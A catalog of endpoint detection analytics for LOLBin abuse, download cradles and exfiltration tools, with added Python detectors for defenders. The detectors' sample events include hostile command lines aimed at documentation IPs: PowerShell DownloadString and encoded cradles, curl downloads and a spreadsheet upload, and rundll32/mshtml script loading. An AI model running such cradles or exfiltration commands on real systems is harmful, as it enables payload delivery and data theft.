Cisco NVM - Rundll32 Abuse of MSHTML.DLL for Payload Download (Endpoint, 2025-07-03, version 1)
This analytic detects suspicious use of `rundll32.exe` in combination with `mshtml.dll` and its `RunHTMLApplication` export.
This behavior is often observed in malware to execute JavaScript or VBScript in memory, enabling payload staging,
bypassing script execution policies, and avoiding the more closely monitored `mshta.exe` binary.
The detection leverages Cisco Network Visibility Module (NVM) telemetry, which pairs network flow activity
with process information such as command-line arguments.
If confirmed malicious, this activity may indicate initial access or payload download.
Cisco NVM - Webserver Download From File Sharing Website (Endpoint, 2025-07-01, version 1)
This analytic detects unexpected outbound network connections initiated by known webserver processes such as `httpd.exe`, `nginx.exe`, or `tomcat.exe` to common file sharing or public content hosting services like GitHub, Discord CDN, Transfer.sh, or Pastebin.
Webservers are rarely expected to perform outbound downloads, especially to dynamic or anonymous file hosting domains. This behavior is often associated with server compromise,
where an attacker uses a reverse shell, webshell, or injected task to fetch malware or tools post-exploitation.
The detection leverages Cisco Network Visibility Module flow data, enriched with process context, to identify this highly suspicious behavior.
Cisco NVM - Suspicious Network Connection Initiated via MsXsl (Endpoint, 2025-07-03, version 1)
This analytic identifies the use of `msxsl.exe` initiating a network connection to a non-private IP address.
Although `msxsl.exe` is a legitimate Microsoft utility used to apply XSLT transformations, adversaries can abuse it
to execute arbitrary code or load external resources in an evasive manner.
This detection leverages Cisco NVM telemetry to identify potentially malicious use of `msxsl.exe` making network connections
that may indicate command and control (C2) or data exfiltration activity.
Windows InstallUtil URL in Command Line (Endpoint, 2025-02-03, version 11)
The following analytic detects the use of Windows InstallUtil.exe with an HTTP or HTTPS URL in the command line. This is identified through Endpoint Detection and Response (EDR) telemetry, focusing on command-line executions containing URLs. This activity is significant as it may indicate an attempt to download and execute malicious code, potentially bypassing application control mechanisms. If confirmed malicious, this could lead to unauthorized code execution, privilege escalation, or persistent access within the environment. Analysts should review the parent process, network connections, file modifications, and related processes for further investigation.
Detect RClone Command-Line Usage (Endpoint, 2025-07-04, version 12)
The following analytic detects the usage of `rclone.exe` with specific command-line arguments indicative of file transfer activities. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process details. This activity is significant as `rclone.exe` is often used by adversaries for data exfiltration, especially during ransomware attacks. If confirmed malicious, this behavior could lead to unauthorized data transfer, resulting in data breaches and potential loss of sensitive information. Immediate isolation of the affected endpoint and further investigation are recommended.
Windows Curl Upload to Remote Destination (Endpoint, 2025-06-20, version 10)
The following analytic detects the use of Windows Curl.exe to upload a file to a remote destination. It identifies command-line arguments such as `-T`, `--upload-file`, `-d`, `--data`, and `-F` in process execution logs. This activity is significant because adversaries may use Curl to exfiltrate data or upload malicious payloads. If confirmed malicious, this could lead to data breaches or further compromise of the system. Analysts should review parallel processes and network logs to determine if the upload was successful and isolate the endpoint if necessary.
Windows InstallUtil Remote Network Connection (Endpoint, 2025-06-26, version 15)
The following analytic detects the Windows InstallUtil.exe binary making a remote network connection. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and network telemetry. This activity is significant because InstallUtil.exe can be exploited to download and execute malicious code, bypassing application control mechanisms. If confirmed malicious, an attacker could achieve code execution, potentially leading to further system compromise, data exfiltration, or lateral movement within the network. Analysts should review the parent process, network connections, and any associated file modifications to determine the legitimacy of this activity.
Cisco NVM - Suspicious Network Connection From Process With No Args (Endpoint, 2025-07-02, version 1)
This analytic detects system binaries that are commonly abused in process injection techniques but are observed initiating network connections without any command-line arguments.
It leverages Cisco Network Visibility Module (NVM) flow data and process arguments
to identify outbound connections initiated by these binaries when their command line is empty or missing.
Binaries such as `rundll32.exe`, `regsvr32.exe`, `dllhost.exe`, `svchost.exe`, and others are legitimate Windows processes that are often injected into by malware or post-exploitation frameworks (e.g., Cobalt Strike) to hide execution.
When these processes are seen initiating a network connection with an empty or missing command line, it can indicate
process injection and communication with a command and control (C2) server.
Cisco NVM - Suspicious Network Connection to IP Lookup Service API (Endpoint, 2025-07-04, version 1)
This analytic identifies non-browser processes reaching out to public IP lookup or geolocation services,
such as `ipinfo.io`, `icanhazip.com`, `ip-api.com`, and others.
These domains are commonly used by legitimate tools, but their usage outside of browsers may indicate
network reconnaissance, virtual machine detection, or staging by malware.
This activity is observed in post-exploitation frameworks, stealer malware, and advanced threat actor campaigns.
The detection relies on Cisco Network Visibility Module (NVM) telemetry and excludes known browser
processes to reduce noise.
Windows File Download Via PowerShell (Endpoint, 2025-06-23, version 1)
The following analytic detects the use of PowerShell's download methods such as
"DownloadString" and "DownloadData" from the WebClient class, or Invoke-WebRequest
and its aliases "IWR" and "Curl".
It leverages data from Endpoint Detection and Response (EDR) agents, focusing on
process execution logs that include command-line details.
This activity is significant because such methods and functions are commonly used in malicious
PowerShell scripts to fetch and execute remote code.
If confirmed malicious, this behavior could allow an attacker to download and run
arbitrary code, potentially leading to unauthorized access, data exfiltration,
or further compromise of the affected system.
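The detection logic described above, run over a few constructed process-creation events, as an added example that is not part of the original analytic or of any vendor's content. It makes two choices a practitioner will want: the `curl`/`iwr` aliases only count when the host process is PowerShell itself (a `curl.exe` binary is a different analytic), and a `-EncodedCommand` argument is decoded (base64 of UTF-16LE) before matching, since download cradles are commonly hidden that way. The sample command lines and the IP 198.51.100.7 are constructed.

```python
import base64
import re

# Only inside these hosts do "iwr" and "curl" mean Invoke-WebRequest.
POWERSHELL_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}

# Download primitives named by the analytic, word-bounded and case-insensitive.
DOWNLOAD_PATTERN = re.compile(
    r"(?i)\b(DownloadString|DownloadData|Invoke-WebRequest|iwr|curl)\b"
)

# -EncodedCommand and the short forms PowerShell accepts, followed by a base64 token.
ENCODED_ARG = re.compile(
    r"(?i)(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)"
)


def encode_command(script):
    """Build a -EncodedCommand value the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except ValueError:
        return None


def analyze(process, cmdline):
    """Classify one process-creation event as a PowerShell download cradle or not."""
    if process.lower() not in POWERSHELL_HOSTS:
        return {"match": False, "methods": [], "decoded": None}
    decoded = decode_encoded_command(cmdline)
    # Match against the visible command line with the base64 blob removed,
    # plus the decoded script, so an encoded cradle is not missed.
    haystack = ENCODED_ARG.sub(" ", cmdline) + " " + (decoded or "")
    methods = sorted({m.lower() for m in DOWNLOAD_PATTERN.findall(haystack)})
    return {"match": bool(methods), "methods": methods, "decoded": decoded}


# Constructed sample events: (process name, command line). Not real telemetry.
SAMPLE_EVENTS = [
    ("powershell.exe",
     "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://198.51.100.7/a.ps1')\""),
    ("powershell.exe",
     "powershell.exe -Command \"iwr http://198.51.100.7/x.exe -OutFile $env:TEMP\\x.exe\""),
    ("powershell.exe",
     "powershell.exe -nop -w hidden -enc " + encode_command(
         "(New-Object Net.WebClient).DownloadData('http://198.51.100.7/p.bin')")),
    ("pwsh.exe", "pwsh.exe -NonInteractive -File C:\\scripts\\report.ps1"),
    ("curl.exe", "curl.exe -o C:\\tools\\file.zip https://example.org/file.zip"),
]


def scan(events=SAMPLE_EVENTS):
    """Run analyze() over a list of events and return the per-event results."""
    return [analyze(p, c) for p, c in events]


if __name__ == "__main__":
    for (proc, _), result in zip(SAMPLE_EVENTS, scan()):
        print(proc, result["match"], result["methods"])
```

Two caveats when tuning this: `pwsh.exe` (PowerShell 6+) no longer ships the `curl` and `wget` aliases, so a `curl` token there is more likely a real binary on PATH; and `DownloadFile` and `Invoke-RestMethod`/`irm` are equally common cradles that the analytic's list does not name, so an extended pattern should include them.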
Cisco NVM - Installation of Typosquatted Python Package (Endpoint, 2025-07-03, version 1)
This analytic detects suspicious Python package installations where the package name resembles a popular Python library but may be typosquatted or slightly altered.
Typosquatting is a common technique used by attackers to trick users into installing malicious packages that mimic legitimate ones.
This detection leverages Cisco NVM flow telemetry and checks for the pip or poetry package managers invoked with the "install" or "add" command, making outbound connections to package repositories such as `pypi.org` with known or suspected typo package names.
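One way to implement the "known or suspected typo package name" check, as an added example that is not the analytic's own logic: package names are pulled out of the pip/poetry command line (version specifiers and extras stripped, names normalized the way PyPI does), the flow destination is required to be a package index host, and each name that is not an exact popular package is compared against a popular-package allowlist using optimal string alignment distance (insert, delete, substitute, adjacent swap). The allowlist, index hosts, and sample command lines below are constructed for the example; a deployment would load the allowlist from real download statistics.

```python
import re

# Constructed: index hosts and a tiny popular-package allowlist.
INDEX_HOSTS = {"pypi.org", "files.pythonhosted.org"}
POPULAR = {"requests", "numpy", "pandas", "urllib3", "setuptools", "cryptography",
           "pyyaml", "boto3", "colorama", "python-dateutil", "pip"}
MANAGERS = {"pip", "pip3", "poetry"}
# Options whose following token is a value (file, URL, path), not a package name.
VALUE_OPTS = {"-r", "--requirement", "-c", "--constraint", "-i", "--index-url",
              "--extra-index-url", "-f", "--find-links", "-t", "--target",
              "-e", "--editable"}


def normalize(name):
    """PEP 503 normalization: lowercase, runs of - _ . collapse to a single '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a, b):
    """Optimal string alignment distance (Levenshtein plus adjacent transposition)."""
    prev2, prev = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            d = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                d = min(d, prev2[j - 2] + 1)  # "pandsa" -> "pandas" is one swap
            cur.append(d)
        prev2, prev = prev, cur
    return prev[-1]


def extract_packages(cmdline):
    """Return normalized package names from a pip/poetry install command line."""
    tokens = cmdline.split()
    names = [t.replace("\\", "/").rsplit("/", 1)[-1].lower() for t in tokens]
    names = [n[:-4] if n.endswith(".exe") else n for n in names]
    if not MANAGERS & set(names):
        return []
    verb = next((i for i, n in enumerate(names) if n in ("install", "add")), None)
    if verb is None:
        return []
    pkgs, skip = [], False
    for t in tokens[verb + 1:]:
        if skip:
            skip = False
            continue
        if t.startswith("-"):
            skip = t in VALUE_OPTS
            continue
        name = re.split(r"[\[<>=!~;@]", t, 1)[0]  # drop extras / version specifiers
        if name:
            pkgs.append(normalize(name))
    return pkgs


def lookalikes(cmdline, dest_host):
    """Return (installed_name, popular_name) pairs that look typosquatted."""
    if dest_host.lower() not in INDEX_HOSTS:
        return []
    hits = []
    for pkg in extract_packages(cmdline):
        if pkg in POPULAR:
            continue
        limit = 1 if len(pkg) < 8 else 2  # allow two edits only for longer names
        best = min(POPULAR, key=lambda p: edit_distance(pkg, p))
        if edit_distance(pkg, best) <= limit:
            hits.append((pkg, best))
    return hits


if __name__ == "__main__":
    for cmd in ("pip install requets", "poetry add colourama",
                "python -m pip install numpy==1.26.4 pandsa"):
        print(cmd, "->", lookalikes(cmd, "pypi.org"))
```

Edit distance alone is noisy: short, legitimately distinct names (for instance a real package one letter away from a popular one) will also score 1, so the allowlist should contain every name you consider legitimate, and the hit is a lead for review rather than a verdict.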
Windows MSIExec Remote Download (Endpoint, 2025-06-26, version 10)
The following analytic detects the use of msiexec.exe with an HTTP or
HTTPS URL in the command line, indicating a remote file download attempt. This detection
leverages data from Endpoint Detection and Response (EDR) agents, focusing on process
execution logs that include command-line details. This activity is significant as
it may indicate an attempt to download and execute potentially malicious software
from a remote server. If confirmed malicious, this could lead to unauthorized code
execution, system compromise, or further malware deployment within the network.
Cisco NVM - Rclone Execution With Network Activity (Endpoint, 2025-07-03, version 1)
This detection identifies execution of the file synchronization utility "rclone".
It leverages Cisco Network Visibility Module logs, specifically flow data in order to capture process executions
initiating network connections.
While rclone is a legitimate command-line tool for syncing data to cloud storage providers, it has been widely abused by threat actors for data exfiltration.
This analytic inspects process name and arguments for rclone and flags usage of suspicious flags.
If matched, this could indicate malicious usage for stealthy data exfiltration or cloud abuse.
WMIC XSL Execution via URL (Endpoint, 2025-07-02, version 10)
The following analytic detects `wmic.exe` loading a remote XSL script
via a URL. This detection leverages Endpoint Detection and Response (EDR) data,
focusing on command-line executions that include HTTP/HTTPS URLs and the /FORMAT
switch. This activity is significant as it indicates a potential application control
bypass, allowing adversaries to execute JScript or VBScript within an XSL file.
If confirmed malicious, this technique can enable attackers to execute arbitrary
code, escalate privileges, or maintain persistence using a trusted Windows tool,
posing a severe threat to the environment.
Windows File Download Via CertUtil (Endpoint, 2025-06-30, version 3)
The following analytic detects the use of `certutil.exe` to download files using the `-URL`, `-urlcache` or `-verifyctl` arguments. This behavior is identified by monitoring command-line executions for these specific arguments via Endpoint Detection and Response (EDR) telemetry. This activity is significant because `certutil.exe` is a legitimate tool often abused by attackers to download and execute malicious payloads. If confirmed malicious, this could allow an attacker to download and execute arbitrary files, potentially leading to code execution, data exfiltration, or further compromise of the system.
Cisco NVM - Susp Script From Archive Triggering Network Activity (Endpoint, 2025-07-01, version 1)
This analytic detects script execution (`wscript.exe` or `cscript.exe`) triggered from compressed files opened directly using
`explorer.exe`, `winrar.exe`, or `7zFM.exe`.
When a user double-clicks a ".js" file inside one of these archives, the archive tool extracts it to a temporary folder under the user's temp directory whose path carries tool-specific markers, and launches it from there.
The analytic leverages Cisco Network Visibility Module (NVM) flow data to look for this specific parent/child relationship combined with an initiated network connection.
This behavior is exploited by threat actors such as Scarlet Goldfinch to deliver and run malicious scripts as an initial access technique.
Detect HTML Help URL in Command Line (Endpoint, 2025-06-30, version 12)
The following analytic detects the execution of hh.exe (HTML Help) loading a Compiled HTML Help (CHM) file from a remote URL. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions containing URLs. This activity is significant as it can indicate an attempt to execute malicious scripts via CHM files, potentially leading to unauthorized code execution. If confirmed malicious, this could allow an attacker to run scripts using engines like JScript or VBScript, leading to further system compromise or data exfiltration.
Cisco NVM - Suspicious Download From File Sharing Website (Endpoint, 2025-07-01, version 1)
This analytic detects suspicious downloads from common file sharing and content delivery platforms using known living-off-the-land binaries (LOLBins)
such as 'curl.exe', 'certutil.exe', 'msiexec.exe', 'powershell.exe', 'wmic.exe', and others.
It leverages Cisco Network Visibility Module logs to correlate network flow activity with process context, including command-line arguments, process path,
and parent process information. These tools are often abused by adversaries and malware to retrieve payloads from public hosting platforms
such as GitHub, Discord CDN, Transfer.sh, or Pastebin.
This detection helps identify potential initial access, payload staging, or command and control activity using legitimate services.
Detect MSHTA Url in Command Line (Endpoint, 2025-06-30, version 14)
The following analytic detects the use of Microsoft HTML Application Host (mshta.exe) to make remote HTTP or HTTPS connections. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line arguments containing URLs. This activity is significant because adversaries often use mshta.exe to download and execute remote .hta files, bypassing security controls. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further network infiltration.
Attacker Tools On Endpoint (Endpoint, 2025-07-07, version 12)
The following analytic detects the execution of tools commonly used by attackers, such as those for unauthorized access, network scanning, or data exfiltration. It leverages process activity data from Endpoint Detection and Response (EDR) agents, focusing on known attacker tool names. This activity is significant because it serves as an early warning of a potential security incident, enabling prompt response. If confirmed malicious, this activity could lead to unauthorized access, data theft, or further network compromise, posing a severe threat to the organization's security infrastructure.
Windows HTTP Network Communication From MSIExec (Endpoint, 2025-06-30, version 6)
The following analytic detects MSIExec making network connections over ports 443 or 80. This behavior is identified by correlating process creation events from Endpoint Detection and Response (EDR) agents with network traffic logs. Typically, MSIExec does not perform network communication to the internet, making this activity unusual and potentially indicative of malicious behavior. If confirmed malicious, an attacker could be using MSIExec to download or communicate with external servers, potentially leading to data exfiltration, command and control (C2) communication, or further malware deployment.
Windows Curl Download to Suspicious Path (Endpoint, 2025-06-30, version 14)
The following analytic detects the use of Windows Curl.exe to download
a file to a suspicious location, such as AppData, ProgramData, or Public directories.
It leverages data from Endpoint Detection and Response (EDR) agents, focusing on
command-line executions that include the -O or --output options. This activity is
significant because downloading files to these locations can indicate an attempt
to bypass security controls or establish persistence. If confirmed malicious, this
behavior could lead to unauthorized code execution, data exfiltration, or further
compromise of the system.
Cisco NVM - Non-Network Binary Making Network Connection (Endpoint, 2025-07-01, version 1)
This analytic detects network connections initiated by binaries that are not typically associated with network communication,
such as 'notepad.exe', 'calc.exe' or 'write.exe'.
It leverages Cisco Network Visibility Module logs to correlate network flow activity with process context, including command-line arguments, process path, and parent process information.
These applications are normally used locally and do not require outbound network access. When they do initiate such connections, it may indicate process hollowing, code injection, or proxy execution, where adversaries abuse a trusted process to mask malicious activity.
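The two NVM process-plus-flow checks described above (injection-prone system binaries connecting out with an empty command line, and non-network binaries connecting out at all) share the same shape: a flow record joined with its process context, a process-name set, and a destination test. The added example below implements both over constructed records; it is not the analytic's own logic. Two choices are assumptions of this example: "empty command line" is computed after stripping the image path itself (EDR and NVM telemetry usually include it as the first token, often quoted), and both rules require a non-private destination, which keeps ordinary SMB traffic to internal file servers out of the non-network-binary rule. The binary sets and the flow records are constructed samples.

```python
import ipaddress
import re

# Injection targets named by the analytic plus a few of the same kind (assumption).
# A genuine instance of these nearly always has arguments (svchost -k, dllhost /Processid:).
INJECTION_TARGETS = {"rundll32.exe", "regsvr32.exe", "dllhost.exe", "svchost.exe",
                     "regasm.exe", "regsvcs.exe", "werfault.exe"}
# Binaries with no legitimate reason to make outbound connections.
NON_NETWORK = {"notepad.exe", "calc.exe", "write.exe", "mspaint.exe"}

# Explicit non-public ranges rather than ipaddress.is_private, which also treats
# the documentation ranges used in these samples (203.0.113.0/24 etc.) as private.
NON_PUBLIC = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16", "100.64.0.0/10",  # loopback, link-local, CGNAT
    "224.0.0.0/4", "::1/128", "fc00::/7", "fe80::/10")]

# Keeps quoted image paths together: "C:\Program Files\x.exe" /a
TOKEN = re.compile(r'"[^"]*"|\S+')


def command_args(process, cmdline):
    """Argument tokens of a command line, with the image path itself removed."""
    tokens = [t.strip('"') for t in TOKEN.findall(cmdline or "")]
    if tokens and tokens[0].replace("\\", "/").rsplit("/", 1)[-1].lower() == process.lower():
        tokens = tokens[1:]
    return tokens


def is_public(ip):
    """True for routable destinations; private, loopback, link-local and multicast are excluded."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in NON_PUBLIC)


def evaluate(record):
    """Apply both rules to one flow record joined with its process context."""
    proc = record["process"].lower()
    hits = []
    if not is_public(record["dst"]):
        return hits
    if proc in INJECTION_TARGETS and not command_args(proc, record.get("cmdline")):
        hits.append("no_args_injection")
    if proc in NON_NETWORK:
        hits.append("non_network_binary")
    return hits


# Constructed NVM-style records (process, cmdline, parent, dst, dport). Not real telemetry.
SAMPLE_RECORDS = [
    {"process": "rundll32.exe", "cmdline": "C:\\Windows\\System32\\rundll32.exe",
     "parent": "winword.exe", "dst": "203.0.113.9", "dport": 443},
    {"process": "svchost.exe", "cmdline": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p",
     "parent": "services.exe", "dst": "203.0.113.9", "dport": 443},
    {"process": "notepad.exe", "cmdline": "\"C:\\Windows\\notepad.exe\" C:\\Users\\a\\notes.txt",
     "parent": "explorer.exe", "dst": "198.51.100.7", "dport": 8080},
    {"process": "rundll32.exe", "cmdline": "\"C:\\Windows\\System32\\rundll32.exe\"",
     "parent": "svchost.exe", "dst": "10.0.0.5", "dport": 445},
]


def alerts(records=SAMPLE_RECORDS):
    """Return (rule, process, parent, dst) tuples for every record that matches a rule."""
    return [(rule, r["process"], r["parent"], r["dst"])
            for r in records for rule in evaluate(r)]


if __name__ == "__main__":
    for a in alerts():
        print(a)
```

The parent process in the alert tuple is the first pivot: `rundll32.exe` with no arguments spawned by an Office application and connecting to the internet is a much stronger signal than the same process under `svchost.exe`.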
Cisco NVM - Curl Execution With Insecure Flags (Endpoint, 2025-07-01, version 1)
This analytic detects the use of `curl.exe` with insecure flags such as `-k`, `--insecure`, `--proxy-insecure`, or `--doh-insecure`
which disable TLS certificate validation.
It leverages Cisco Network Visibility Module (NVM) flow data and process arguments
to identify outbound connections initiated by curl where TLS checks were explicitly disabled.
This behavior may indicate an attempt to bypass certificate validation to connect to potentially untrusted or malicious endpoints,
a common tactic in red team operations, malware staging, or data exfiltration over HTTPS.
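The three curl analytics on this page (upload flags, download to a suspicious path, insecure TLS flags) all reduce to classifying a `curl.exe` command line, and the part that breaks naive substring matching is that curl bundles short options: `-sk` is `-s -k`, and in `-kLo C:\ProgramData\x.exe` the `-o` takes the following token as its value. The added example below is a small curl argument expander with the three checks on top; it is not the analytics' own logic, and the option tables, the suspicious-directory pattern, and the sample command lines are constructed for the example (the upload set extends the analytic's list with `--data-binary` and `--data-raw`).

```python
import re

# Short options that consume a value, so "-ko file" binds "file" to -o, not -k.
SHORT_WITH_VALUE = set("oTdFHXubAeKmxwcDECrUz")
LONG_WITH_VALUE = {"--output", "--upload-file", "--data", "--data-binary", "--data-raw",
                   "--data-urlencode", "--form", "--header", "--request", "--user",
                   "--proxy", "--cookie", "--referer", "--user-agent", "--config",
                   "--max-time", "--url", "--cacert", "--cert", "--write-out",
                   "--cookie-jar", "--dump-header", "--range", "--proxy-user"}

INSECURE = {"-k", "--insecure", "--proxy-insecure", "--doh-insecure"}
UPLOAD = {"-T", "--upload-file", "-d", "--data", "--data-binary", "--data-raw", "-F", "--form"}
OUTPUT = {"-o", "--output"}
# Directories the analytic calls suspicious; assumption: Temp is included as well.
SUSPICIOUS_DIR = re.compile(r"(?i)[\\/](appdata|programdata|users[\\/]public|temp|tmp)[\\/]")
TOKEN = re.compile(r'"[^"]*"|\S+')


def expand(tokens):
    """Turn curl argv into (option, value) pairs, expanding bundled short flags."""
    pairs, i = [], 0
    while i < len(tokens):
        t = tokens[i]
        if t.startswith("--") and len(t) > 2:
            if "=" in t:
                pairs.append(tuple(t.split("=", 1)))
            elif t in LONG_WITH_VALUE and i + 1 < len(tokens):
                pairs.append((t, tokens[i + 1]))
                i += 1
            else:
                pairs.append((t, None))
        elif t.startswith("-") and len(t) > 1:
            j = 1
            while j < len(t):
                c = t[j]
                if c in SHORT_WITH_VALUE:
                    if j + 1 < len(t):           # value attached: -oFILE
                        val = t[j + 1:]
                    elif i + 1 < len(tokens):    # value is the next token
                        val = tokens[i + 1]
                        i += 1
                    else:
                        val = None
                    pairs.append(("-" + c, val))
                    break
                pairs.append(("-" + c, None))    # boolean flag inside a bundle
                j += 1
        else:
            pairs.append((None, t))              # positional argument, normally the URL
        i += 1
    return pairs


def classify(cmdline):
    """Apply the upload, suspicious-output-path and insecure-TLS checks to a curl command line."""
    tokens = [t.strip('"') for t in TOKEN.findall(cmdline)]
    pairs = expand(tokens[1:])                   # tokens[0] is curl.exe itself
    output = next((v for o, v in pairs if o in OUTPUT), None)
    urls = [v for o, v in pairs
            if (o is None or o == "--url") and v
            and v.lower().startswith(("http://", "https://", "ftp://"))]
    return {
        "insecure": [o for o, _ in pairs if o in INSECURE],
        "upload": [o for o, _ in pairs if o in UPLOAD],
        "output": output,
        "suspicious_path": bool(output and SUSPICIOUS_DIR.search(output)),
        "urls": urls,
    }


if __name__ == "__main__":
    # Constructed sample command lines; the IPs are documentation addresses.
    for cmd in (r"curl.exe -sk https://198.51.100.7/a.exe -o C:\Users\Public\a.exe",
                r"curl.exe -kLo C:\ProgramData\svc.exe http://198.51.100.7/svc.exe",
                r"curl.exe -T C:\finance\q3.xlsx https://transfer.example/upload"):
        print(cmd, "->", classify(cmd))
```

One gap to keep in mind: `-O`/`--remote-name` writes to the process's working directory, so the destination path never appears in the command line and has to come from the process's current directory in the telemetry, if it is recorded at all.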
Cisco NVM - Suspicious File Download via Headless Browser (Endpoint, 2025-07-02, version 1)
This analytic identifies the use of Chromium-based browsers (like Microsoft Edge) running in headless mode with the `--dump-dom` argument.
This behavior has been observed in attack campaigns such as DUCKTAIL, where browsers are automated to stealthily download content from the internet using direct URLs or suspicious hosting platforms.
The detection focuses on identifying connections to known file-sharing domains or direct IPs extracted from command-line arguments and cross-checks those against the destination of the flow.
Since it leverages Cisco Network Visibility Module telemetry, the rule triggers only if a network connection is made.
Windows PowerShell FakeCAPTCHA Clipboard Execution (Endpoint, 2025-06-30, version 2)
This detection identifies potential FakeCAPTCHA/ClickFix clipboard hijacking campaigns by looking for PowerShell execution with hidden window parameters and distinctive strings related to fake CAPTCHA verification. These campaigns use social engineering to trick users into pasting malicious PowerShell commands from their clipboard, typically delivering information stealers or remote access trojans.
Cisco NVM - MSHTML or MSHTA Network Execution Without URL in CLI (Endpoint, 2025-07-03, version 1)
This analytic detects suspicious use of 'mshta.exe' or 'rundll32.exe' invoking 'mshtml.dll'
or the 'RunHTMLApplication' export without including a direct HTTP/HTTPS URL in the command line.
This pattern could be associated with obfuscated script execution used by threat actors during
initial access or payload staging. The absence of a visible URL may indicate attempts to evade static
detections by embedding the URL via string concatenation, encoding (e.g., hex), or indirect script loaders
like 'GetObject()'.
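The three MSHTML/MSHTA analytics on this page (rundll32 with `mshtml`/`RunHTMLApplication`, mshta with a URL in the command line, and either of them without a visible URL) can be expressed as one classifier, shown here as an added example that is not any of the analytics' own logic. It recognizes the `mshtml,RunHTMLApplication` export reference in a rundll32 command line, checks for a literal HTTP/HTTPS URL, and, when none is present, records which of the evasions the analytic names (string concatenation, hex or `chr()` encoding, `GetObject()`) appear. The sample command lines, including the `javascript:"\..\mshtml,RunHTMLApplication"` form, and the IP 198.51.100.7 are constructed; the evasion patterns are illustrative and will need tuning.

```python
import re

# rundll32 reference to the export, with or without ".dll" and surrounding spaces.
MSHTML_RUNHTA = re.compile(r"(?i)mshtml(\.dll)?\s*,\s*RunHTMLApplication")
# A literal URL visible in the command line.
URL = re.compile(r"(?i)\bhttps?://[^\s\"')]+")
# Hints that a URL is assembled at run time instead of appearing literally (illustrative).
EVASION_HINTS = {
    "getobject": re.compile(r"(?i)\bGetObject\s*\("),
    "concatenation": re.compile(r"""["']\s*\+\s*["']"""),
    "hex_or_char": re.compile(r"(?i)\\x[0-9a-f]{2}|\bchr\s*\("),
}


def classify(process, cmdline):
    """Identify the technique in use and whether a URL is visible; None if not relevant."""
    proc = process.lower()
    if proc == "rundll32.exe" and MSHTML_RUNHTA.search(cmdline):
        technique = "rundll32_mshtml"
    elif proc == "mshta.exe":
        technique = "mshta"
    else:
        return None
    url = URL.search(cmdline)
    hints = [name for name, rx in EVASION_HINTS.items() if rx.search(cmdline)]
    return {"technique": technique, "url": url.group(0) if url else None, "hints": hints}


def triage(process, cmdline):
    """Map one process event to the analytics it would satisfy (network flow assumed present)."""
    info = classify(process, cmdline)
    if info is None:
        return []
    labels = []
    if info["technique"] == "rundll32_mshtml":
        labels.append("rundll32_mshtml_payload")
    if info["technique"] == "mshta" and info["url"]:
        labels.append("mshta_url")
    if info["url"] is None:
        labels.append("no_url_in_cli")
    return labels


# Constructed sample events: (process, command line). Not real telemetry.
SAMPLES = [
    ("rundll32.exe", 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";'
                     'document.write();GetObject("script:http://198.51.100.7/p.sct")'),
    ("rundll32.exe", 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";'
                     'GetObject("script:"+"ht"+"tp://198.51.100.7/p.sct")'),
    ("mshta.exe", "mshta.exe https://198.51.100.7/a.hta"),
    ("mshta.exe", 'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell"",0")'),
    ("rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
]


if __name__ == "__main__":
    for proc, cmd in SAMPLES:
        print(proc, triage(proc, cmd), classify(proc, cmd))
```

Because the NVM-based analytics only fire when a flow exists, the second sample is the interesting one: the destination is known from the flow even though the command line never contains `http://`, so the flow's destination, not the command line, is what to pivot on.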
Cisco NVM - Outbound Connection to Suspicious Port (Endpoint, 2025-07-01, version 1)
The following analytic detects any outbound network connection from an endpoint process to a known suspicious or non-standard port.
It leverages Cisco Network Visibility Module flow data logs to identify potentially suspicious behavior by looking at processes
communicating over ports such as 4444, 2222, or 51820, which are commonly used by tools like Metasploit, Sliver C2, and other pentest, red team, or malware frameworks.
Some of these ports also carry legitimate traffic (51820 is the WireGuard default and 2222 is a common alternate SSH port), so
these connections are worth investigating further, especially when initiated by unexpected or non-network-native binaries.